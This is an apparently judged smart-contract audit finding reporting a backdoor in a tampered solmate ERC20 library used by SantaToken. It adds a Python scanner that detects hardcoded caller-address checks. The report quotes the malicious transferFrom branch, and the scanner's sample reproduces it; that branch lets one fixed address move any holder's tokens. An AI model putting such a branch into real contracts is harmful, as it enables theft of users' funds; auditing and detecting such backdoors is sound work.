Submission Details
Severity: high
Valid

Steal SantaToken tokens from any address

Summary

A malicious ERC20 library is used, giving address 0x815F577F1c1bcE213c012f166744937C889DAF17 permission to modify the SantaToken balance of any address.

Vulnerability Details

SantaToken uses the ERC20 library from "solmate-bad/src/tokens/ERC20.sol", which is a modified version of solmate's ERC20. Malicious code has been added to the transferFrom function:

    // hehehe :)
    // https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d
    if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
        balanceOf[from] -= amount;
        unchecked {
            balanceOf[to] += amount;
        }
        emit Transfer(from, to, amount);
        return true;
    }

Impact

With this modification, address 0x815F577F1c1bcE213c012f166744937C889DAF17 can modify the balance of any address, including stealing SantaToken from other addresses without any allowance being granted.

Tools Used

Foundry

Recommendations

Use the original solmate library instead.
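
A source-level check for this class of backdoor in vendored Solidity dependencies, as an added example (not part of the submission or of either library): it flags any comparison of msg.sender or tx.origin against a hardcoded 20-byte address literal. The function names and the SAMPLE wrapper around the page's snippet are constructed for illustration.

```python
import re

ADDR = r"0x[0-9a-fA-F]{40}"                 # 20-byte address literal
CALLER = r"(?:msg\.sender|tx\.origin)"
# Caller compared (== or !=) with a literal address, in either operand order.
PATTERN = re.compile(
    rf"(?:{CALLER}\s*[!=]=\s*(?P<a>{ADDR}))|(?:(?P<b>{ADDR})\s*[!=]=\s*{CALLER})"
)

def strip_comments(src: str) -> str:
    """Blank out /* */ and // comments while keeping line numbers stable.
    Simplification: does not special-case '//' inside string literals."""
    blank = lambda m: re.sub(r"[^\n]", " ", m.group())
    src = re.sub(r"/\*.*?\*/", blank, src, flags=re.S)
    return re.sub(r"//[^\n]*", "", src)

def find_hardcoded_caller_checks(src: str):
    """Return [(line_number, address)] for each hardcoded caller comparison."""
    text = strip_comments(src)
    hits = []
    for m in PATTERN.finditer(text):        # \s also spans line breaks
        lineno = text.count("\n", 0, m.start()) + 1
        hits.append((lineno, m.group("a") or m.group("b")))
    return hits

# Constructed sample: the snippet quoted in the finding, wrapped in an
# assumed transferFrom shell so the scanner has a realistic input.
SAMPLE = """\
function transferFrom(address from, address to, uint256 amount) public returns (bool) {
    // hehehe :)
    if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
        balanceOf[from] -= amount;
        unchecked { balanceOf[to] += amount; }
        emit Transfer(from, to, amount);
        return true;
    }
    uint256 allowed = allowance[from][msg.sender];
    if (allowed != type(uint256).max) allowance[from][msg.sender] = allowed - amount;
    return true;
}
"""

if __name__ == "__main__":
    for lineno, addr in find_hardcoded_caller_checks(SAMPLE):
        print(f"line {lineno}: caller compared to hardcoded address {addr}")
```

A fuzz test over random callers is very unlikely to hit one specific 160-bit address, so a source scan like this (or a diff of the vendored file against upstream solmate) is the practical way to catch such a branch.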

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88
